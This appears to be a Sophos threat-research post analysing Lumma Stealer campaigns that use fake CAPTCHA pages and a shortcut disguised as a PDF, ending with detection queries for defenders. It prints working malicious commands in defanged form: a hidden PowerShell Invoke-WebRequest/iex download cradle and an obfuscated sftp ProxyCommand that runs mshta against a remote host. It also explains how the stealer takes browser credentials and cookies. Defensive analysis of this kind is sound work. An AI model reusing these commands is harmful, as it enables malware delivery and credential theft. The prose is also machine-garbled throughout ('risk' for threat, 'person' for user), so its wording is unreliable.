In September 2024, a risk hunt throughout Sophos Managed Detection and Response’s telemetry uncovered a Lumma Stealer marketing campaign utilizing faux CAPTCHA websites that instructed victims to stick a (malicious) PowerShell-encoded command into Windows’ command-line interface. Subsequent investigations allowed us to dig deeply into the mechanics of the infamous info stealer. This publish recounts these discoveries, as seen in varied MDR investigations through the fall and winter of 2024-25.
Lumma Stealer fundamentals
Lumma Stealer has been energetic since mid-2022 and is believed to have originated with a Russian-language developer. Offered as Malware-as-a-Service (MaaS), its maintainer sells entry to the stealer through Telegram and gives updates and person help. Further info is made out there on a devoted Gitbook web site.
The infostealer targets quite a lot of valuables together with passwords, session tokens, cryptocurrency wallets, and private info from compromised units. The risk is amplified by its crafty supply strategies. In one occasion, the attacker manipulated customers’ belief in CAPTCHA challenges and employed social engineering ways to deceive victims in search of software program downloads. In one other, extra easy case, the person was directed to a malicious web site and prompted to open a file in Windows Explorer.
The variations we noticed in Lumma Stealer conduct are important to defenders, as a result of Lumma Stealer an infection has been extraordinarily widespread in latest months. That stated, the supply strategies we noticed may simply be tailored to different malware past Lumma Stealer, making their documentation helpful. (A listing of IoCs might be made out there on our GitHub repository.)
Our researchers are conscious of comparable work underway from Netskope Threat Labs, together with an estimate that as many as 5,000 fake-CAPTCHA websites could also be at the moment concerned in a Lumma Stealer-related marketing campaign. Likewise, researchers at Qualys have achieved strong analysis to element the mechanisms Lumma Stealer has utilized in latest months. Sophos strongly recommends scrutiny of the IoCs these researchers have supplied to the general public, along with our personal.
Investigation #1: The artwork(istsponsorship) of the steal
In this investigation, the noticed assault circulate with CAPTCHA involvement was comparatively easy: The attacker creates a malicious web site, “protected” by a normal-looking CAPTCHA verification at hxxps[://]camplytic[.]com/go/cdff9f96-8cbd-4c44-b679-2f612a64cd00. The visiting person clicks on the acquainted I-am-not-a-robot field, as proven in Figure 1.
Figure 1: A well-recognized-seeming verification field
The person was subsequent redirected to a different alleged verification web page, hxxps[://]sos-at-vie-1[.]exo[.]io/store-as/cloudflare-new-artist[.]html, on which they have been requested to first load the Windows “run” command, then press Cntl-V adopted by Enter, as proven in Figure 2.
Figure 2: The subsequent “security check” request is considerably uncommon, however pretty easy for unwary customers
Behind the scenes, as soon as the person pastes the PowerShell command into the Run dialog field, it triggers a hid JavaScript operate that drops a PowerShell script onto the Clipboard and runs it in a hidden window:
C:WINDOWSsystem32WindowsPowerShellv1.0PowerShell.exe" -W Hidden -command $uR= hxxps[://]fixedzip[.]oss-ap-southeast5[.]aliyuncs[.]com/new-artist[.]txt'; $reS=Invoke-WebRequest -Uri $uR -UseBasicParsing; $t=$reS.Content; iex $t
That script retrieves the infostealer malware from a command-and-control (C2) server, and it’s off to the payload-retrieval races, as proven in Figure 3.
Figure 3: Attack circulate with CAPTCHA abuse; notice that Lumma Stealer itself is loaded halfway by way of the method
When run, the PowerShell script retrieves the Lumma Stealer malware from an exterior server, initiating the obtain of the primary stage of the malicious payload onto the compromised system. The command
$uR=hxxps[://]fixedzip[.]oss-ap-southeast-5[.]aliyuncs[.]com/new-artist[.]txt'; $reS=Invoke-WebRequest -Uri $uR -UseBasicParsing; $t=$reS.Content; iex$t
retrieves the content material from the new-artist.txt file hosted on the exterior server. This content material is then processed and executed by way of the Invoke-Expression cmdlet.
This new-artist.txt file within the code above accommodates one other PowerShell script, which connects to hxxps[://]fixedzip[.]oss-ap-southeast-5[.]aliyuncs[.]com/artist[.]zip . This zipped copy of Lumma Stealer is downloaded to the goal machine, extracted into the person’s %AppData% path, and saved as ‘ArtistSponsorship.exe’ (sha256:e298cd6c5fe7b9b05a28480fd215ddcbd7aaa48a) for additional execution, as proven in Figure 4.
Figure 4: The toxic obtain
The ArtistSponsorship.exe file accommodates, amongst a number of dropped recordsdata as seen in Figure 5, the obfuscated AutoIt.exe script (sha256:05d8cf394190f3a707abfb25fb44d7da9d5f533d7d2063b23c00cc11253c8be7). These are dropped within the %temp% listing.
Figure 5: Multiple recordsdata dropped into %temp% by ArtistSponsorship.exe
The AutoIT script does plenty of issues and contains shellcode. Among its actions, it connects to the C2 area snail-r1ced[.]cyou – IP 104.21.84[.]251 (CLOUDFLARENET). Lumma Stealer then targets person information, login credentials from varied browsers, bitcoin wallets, and cookies. In Figure 6, AutoIt3.exe is accessing login information and cookies utilized by the Chrome browser.
Figure 6: Catching AutoIT3.exe red-handed with Chrome login credentials (amongst different issues)
AutoIt3.exe then executes the script X.a3x to exfiltrate the captured Chrome login information and cookies to the C2 IP104.21.84[.]251(CLOUDFLARENET). In the case we noticed, a file of simply 6.37MB – the login information and cookies — was efficiently exfiltrated, after which the AutoIt3.exe course of terminated.
Investigation #2: A deep dive into the code
In this part, we’ll dig much more deeply into the specifics of recordsdata and processes we encountered inside the payload supply chain. In the case we’ll look at, the person inadvertently visited an contaminated web site.
First, the person was prompted to open a PDF-format file in Windows Explorer, as proven in Figure 7.
Figure 7: The person is trying to load a PDF, however that’s not what’s about to occur
The file, apparently a PDF known as “Instruction_695-18014-012_Rev.PDF,” is definitely a remotely hosted .lnk (shortcut) file, as proven in Figure 8.
Figure 8: Windows warns that that is really a shortcut, not a PDF
The shortcut file makes an attempt to execute an obfuscated PowerShell script, as proven in Figure 9.
Figure 9: The obfuscated script within the Target discipline
The full textual content of the obfuscated script is
C:WindowsSystem32OpenSSHsftp.exe -o ProxyCommand="powershell powershell -Command ('m]]]]]]sh]]]]]]]t]]]]]a]]]]]]].]]]]]ex]]]]]]]e]]]]] h]]]]]tt]]]ps:]]]]]]/]]]]]]/s]]]]]t]]]]]]]atic]]].kli]]]]]]pxuh]]]]]aq.sh]]]]]]]op/W7]]]7Z9]]]].mp4]]' -replace ']')
When a person executes the shortcut file, sftp.exe will execute the obfuscated command by way of the ProxyCommand flag. However, sftp.exe doesn’t really set up the community connection itself; it delegates the duty to ssh.exe with a particular set of parameters:
"C:WindowsSystem32OpenSSHssh.exe" "-oForwardX11 no" "-oForwardAgent no" "-oPermitLocalCommand no" "-oClearAllForwardings sure" -o "ProxyCommand=powershell powershell -Command ('m]]]]]]sh]]]]]]]t]]]]]a]]]]]]].]]]]]ex]]]]]]]e]]]]] h]]]]]tt]]]ps:]]]]]]/]]]]]]/s]]]]]t]]]]]]]atic]]].kli]]]]]]pxuh]]]]]aq.sh]]]]]]]op/W7]]]7Z9]]]].mp4]]' -replace ']')" "-oProtocol 2" -s -- . sftp .
As we see within the block of code above, the parameters exploit the ‘ProxyCommand’ possibility. ProxyCommand specifies a command to run as an alternative of connecting on to the goal host. In the above instance, ProxyCommand is about to run PowerShell, which in flip executes mshta.exe to obtain and execute a distant script.
The first PowerShell script execution is as proven in Figure 10.
Figure 10: The first execution is revealed
This script processes AES-encrypted information inside the aepcc operate, as proven in Figure 11.
Figure 11: Lumma Stealer’s creators didn’t select a weak encryption algorithm
In Figure 12, the AES secret’s listed first. It’s adopted by an initialization vector (IV) of 16 bytes of zeroes; the IV is there so as to add randomness to the beginning of the encryption course of. Despite that, we decrypted the information utilizing CyberChef, as proven.
Figure 12: CyberChef begins to disclose what’s occurring
Next, we decoded the script from base64 – nearer to readable, however now a big mass of decimals, as proven in Figure 13.
Figure 13: The script comes into higher focus
The decimals in that mass of numbers are in reality ASCII characters. An extra cross by CyberChef, as proven in Figure 14, reveals that it is a PE file, one designed to obtain additional payloads.
Figure 14: A PE file with a single malicious function
This script performs the next actions:
- Sets variable ‘O’ equal to the C2 URL.
- Dynamically retrieve the ‘Load’ methodology from the .NET ‘System.Reflection.Assembly’ class.
The ‘Load’ methodology is then invoked on the worth of variable ‘oQ7’ (the obfuscated PE); this primarily hundreds the PE into reminiscence. - As displayed above, the PE accommodates a single static methodology named ‘aHdiNKuWlR’. This methodology downloads the content material of the URL handed to it using WebClient.
The script passes the worth of the ‘O’ variable (containing the C2 URL) to the PE loaded in reminiscence. - The ‘aHdiNKuWlR’ methodology outlined within the PE processes the URL handed to it by downloading its content material utilizing DownloadString.
- The ‘appdataroaming’ path is saved to the variable ‘Ikmg’.
- Function ‘bOje’ is executed and performs the next actions:
- The operate first appends ‘i1040gi.pdf’ to the ‘Ikmg’ (file path) variable.
- Makes a name to operate ‘rlYDr’ and passes a novel identifier which is retrieved from the AES decrypted information at place 103 with size 86, as proven in Figure 15.
Figure 15: A hexadecimal view of the distinctive identifier - Checks if the ‘appdataroamingi1040gi.pdf’ path doesn’t exist.
- If the file path doesn’t exist, executes operate ‘XSFbo’. This operate takes two parameters:
- ‘BtPdn’: This operate takes the distinctive identifier as an enter. It extracts a particular 100 characters from the AES-decrypted information and makes use of it as a lookup desk to transform the distinctive identifier right into a URL. The ensuing URL is a official PDF doc from the IRS.
- The second parameter is the file path in variable ‘EVcD’ as proven in Figure 16.
Figure 16: The file path seems
After decoding the URL, operate ‘XSFbo’ takes the URL and downloads the contents utilizing ‘Net.WebClient’ (which was additionally decoded utilizing ‘BtnPdn’), then saves the PDF to the file path laid out in variable ‘EVcD’ as proven in Figure 17.
Figure 17: The file path seems once more, because the save vacation spot
Finally, the PDF that was downloaded is executed, as proven in Figures 18 and 19.
Figure 18: There it’s…
Figure 19: …and there it goes
But wait! There’s extra!
To conclude this evaluation, let’s hint again to the phases earlier than the benign PDF is downloaded and executed.
We first seen that there was a dynamic retrieval of the ‘Load’ methodology, which was used to load the embedded PE that we decoded. Then we noticed a static methodology outlined contained in the PE that was being leveraged to obtain the subsequent stage. Lastly, we see the downloaded script executed with ‘InvokeScript’. Let’s give attention to this subsequent stage.
The subsequent stage that was downloaded is closely obfuscated with ineffective feedback and really lengthy variable names, as proven in Figure 20.
Figure 20: Mooncake, pasties, fritter, ragu, kebabs, taco… clearly somebody was obfuscating on an empty abdomen
Once de-obfuscated, we found that this script is accountable for downloading a remaining stage. The script options dynamic decision of low-level Windows APIs comparable to ‘GetProcAddress’, VirtualProtect’, and ‘AmsiInitialize’.
Detections
The following queries could show helpful for defenders in search of proof of Lumma Stealer of their programs.
Identify all risk recordsdata scripts/binaries from recognized SPIDs utilized to construct Lumma Stealer inside the final eight hours or inside a time vary:
SELECT
strftime('%Y-%m-%d %H:%M:%S', datetime(sfj.time,'unixepoch')) dateTime,sfj.time AS epoch_time, spj.cmd_line, CASE sfj.event_type
WHEN 0 THEN 'Created'
WHEN 2 THEN 'Deleted'
END eventType, sfj.sophos_pid, sfj.path AS file_path, sfj.target_path, sfj.file_size, strftime('%Y-%m-%d %H:%M:%S', datetime(sfj.creation_time,'unixepoch')) birth_time_utc, strftime('%Y-%m-%d %H:%M:%S', datetime(sfj.last_write_time,'unixepoch')) modified_time_utc, spj.sid, u.username, sfj.sha256
FROM sophos_file_journal sfj
LEFT JOIN sophos_process_journal spj ON sfj.sophos_pid = spj.sophos_pid
LEFT JOIN customers u ON spj.sid = u.uuid
WHERE
sfj.sophos_pid IN ('', '', '', '')
AND
sfj.event_type IN (0, 2)
AND
sfj.time > strftime('%s', 'now', '-8 hour')
--sfj.time > strftime('%s','2024-11-13 04:44:32') AND sfj.time < strftime('%s','2024-11-13 04:47:35')
Identify attainable exfiltration and C2:
SELECT
strftime('%Y-%m-%d %H:%M:%S', datetime(time,'unixepoch')) dateTime, *
FROM sophos_process_activity
WHERE sophos_pid IN ('', '', '', '')
AND topic IN ('Dns','FileOtherReads', 'Ip', 'RuntimeIOCs', 'Process', 'Network')
AND time > strftime('%s', 'now', '-8 hour')
--AND time > strftime('%s','2024-11-13 04:44:32') AND time < strftime('%s','2024-11-13 04:47:35')
Identify the supply URL of the faux CAPTCHA / verification immediate from the looking historical past:
SELECT f.path,f.listing,f.filename,f.dimension,strftime('%Y-%m-%d %H:%M:%S',datetime(f.mtime,'unixepoch')) AS modified_time_utc,strftime('%Y-%m-%d %H:%M:%S',datetime(f.atime,'unixepoch')) AS last_access_time_utc,strftime('%Y-%m-%d %H:%M:%S',datetime(f.ctime,'unixepoch')) AS change_time_utc,strftime('%Y-%m-%d %H:%M:%S',datetime(f.btime,'unixepoch')) AS birth_time_utc,attributes, h.sha256 AS SHA256, h.sha1 AS SHA1, h.md5 AS MD5
FROM file f LEFT JOIN hash h on f.path = h.path
WHERE f.path LIKE 'C:Users%AppDataLocalGoogleChromeConsumer Data%History' -- Windows historical past for Chrome
OR f.path LIKE 'C:Users%AppDataLocalMicrosoftEdgeConsumer Data%History' -- historical past for Edge
OR f.path LIKE 'C:Users%AppDataRoamingMozillaFirefoxProfilespercentplaces.sqlite' --Windows historical past for Firefox;
OR f.path LIKE 'C:Users%AppDataRoamingMozillaFirefoxProfilespercentdownloads.sqlite' --Windows historical past for Firefox;
order by f.mtime DESC
Conclusion
Lumma Stealer stays a major risk as of this writing. The documented tactic of utilizing faux CAPTCHA websites to lull victims into getting into a malicious command on their very own programs is an unpleasant twist on the scenario; Sophos’ endpoint safety counters the risk with a spread of malware detections and behavioral-analysis ways, however educating customers to distrust CAPTCHAs, after so a few years of convincing them to reply them, is a heavy carry. As these training efforts develop, defenders are suggested to institute acceptable endpoint-detection expertise and to remember that the ways of this all-too-common infostealer proceed to evolve.
Acknowledgements
Andrew Jaeger, Nayana V R, David Whitehall, and Waldemar Stiefvater contributed evaluation and constructive critique to this work.
Indicators of compromise
The IoCs compiled on this investigation are out there on our GitHub repository.